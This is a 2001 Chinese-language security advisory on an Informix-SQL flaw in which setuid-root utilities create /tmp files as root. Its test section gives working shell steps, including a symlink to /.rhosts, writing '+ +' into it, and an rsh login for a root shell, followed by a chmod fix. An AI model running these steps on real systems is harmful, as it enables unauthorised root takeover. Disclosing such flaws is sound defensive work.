Informix-SQL 存在任意文件可建立漏洞发布时间:2001-09-05 更新时间:2001-09-05 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 informix-SQL详细描述 Informix-SQL 存在漏洞可以允许本地用户以ROOT的权利建立任意文件。问题发生在与onbar_d,ondblog,onsmsync,onsrvapd程序中。 测试代码 PART 1 : $ id uid=500 (informix) gid=120 (informix) groups=1000(loveyou) $ umask 0000 $ cd ~informix/bin (Informix HOME Directory) $ ./onshowaudit INFORMIX-SQL Version 7.31.UC5 $ ls -al onbar_d ondblog onsmsync onsrvapd -rwsr-sr-x 1 root informix 2234104 Nov 18 1999 onbar_d -rwsr-sr-x 1 root informix 2219456 Nov 18 1999 ondblog -rwsr-sr-x 1 root informix 2284972 Apr 10 2000 onsmsync -rwsr-sr-x 1 root informix 39144 Nov 18 1999 onsrvapd $ ./onbar_d or ./ondblog or ./onsmsync $ ls -al /tmp/bar* -rw-rw---- 1 root informix 557 Aug 29 17:26 /tmp/bar_act.log -rw-rw---- 1 root informix 0 Aug 29 17:26 /tmp/bar_dbug.log PART 2: $ ./onsrvapd $ ls -al /tmp/ons* -rw-rw-rw- 1 root informix 141 Aug 29 17:38 /tmp/onsnmp.(hostname).log -rw-rw-rw- 1 informix informix 319 Aug 29 17:38 /tmp/onsrvapd.log PART 3: $ ./snmpdm $ ls -al /tmp/snmpd.log -rwxrwxrwx 1 root root 1085 Aug 29 17:43 /tmp/snmpd.log PART 4: loveyou@dogfoot$ ln -s /.rhosts /tmp/onsbmp.dogfoot.log loveyou@dogfoot$ ~informix/bin/onsrvapd & loveyou@dogfoot$ ls -al /.rhosts -rw-rw-rw- 1 root informix 141 Aug 29 18:28 /.rhosts loveyou@dogfoot$ echo "+ +" > /.rhosts loveyou@dogfoot$ rsh -l root localhost csh -i # whoami root 解决方案 $ su - # cd ~informix/bin (Informix HOME Directory) # chmod o-s onbar_d ondblog onsmsync onsrvapd 相关信息 loveyou@hackerslab.org [ http://www.hackerslab.org ] |
